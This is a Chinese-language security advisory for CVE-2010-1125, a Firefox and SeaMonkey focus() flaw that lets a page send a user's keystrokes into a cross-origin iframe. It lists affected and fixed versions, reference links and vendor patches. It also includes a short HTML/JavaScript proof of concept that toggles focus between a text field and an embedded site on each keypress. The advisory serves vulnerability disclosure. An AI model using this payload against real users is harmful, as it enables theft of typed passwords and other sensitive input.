受影响系统:
Mozilla Firefox 3.6.x
Mozilla Firefox 3.5.x
Mozilla SeaMonkey < 2.0.5
不受影响系统:
Mozilla Firefox 3.6.4
Mozilla Firefox 3.5.10
Mozilla SeaMonkey 2.0.5
描述:
BUGTRAQ ID: 40701
CVE ID: CVE-2010-1125
Firefox是非常流行的开源WEB浏览器。
Firefox的focus()函数可以在用户键盘输入时更改光标的焦点,将键盘输入定向到非预期的位置;当通过iframe将一个域的内容嵌入到另一个域中时也可能跨来源出现上述行为。恶意的网页可以利用这个漏洞在用户键入口令等敏感信息时窃取键盘敲击动作。
<*来源:Michal Zalewski (lcamtuf@echelon.pl)
链接:http://www.mozilla.org/security/announce/2010/mfsa2010-31.html
http://secunia.com/advisories/40309/
http://lcamtuf.blogspot.com/2010/06/curse-of-inverse-strokejacking.html
https://www.redhat.com/support/errata/RHSA-2010-0501.html
https://www.redhat.com/support/errata/RHSA-2010-0500.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<script>
function hkd(e) {
document.getElementById("page").focus();
setTimeout("document.getElementById(‘page’).blur();document.getElementById(‘field’).focus();", 10);
}
</script>
</head>
<body>
<input type="text" placeholder="Write something here" onkeydown="hkd(event)" id="field"><br>
<iframe src="http://www.google.com" width="800" height="600" id="page"></iframe>
</body>
</html>
建议:
厂商补丁:
Mozilla
——-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
RedHat
——
RedHat已经为此发布了一个安全公告(RHSA-2010:0500-01)以及相应补丁:
RHSA-2010:0500-01:Critical: firefox security, bug fix, and enhancement update
链接:https://www.redhat.com/support/errata/RHSA-2010-0500.html
0 条评论。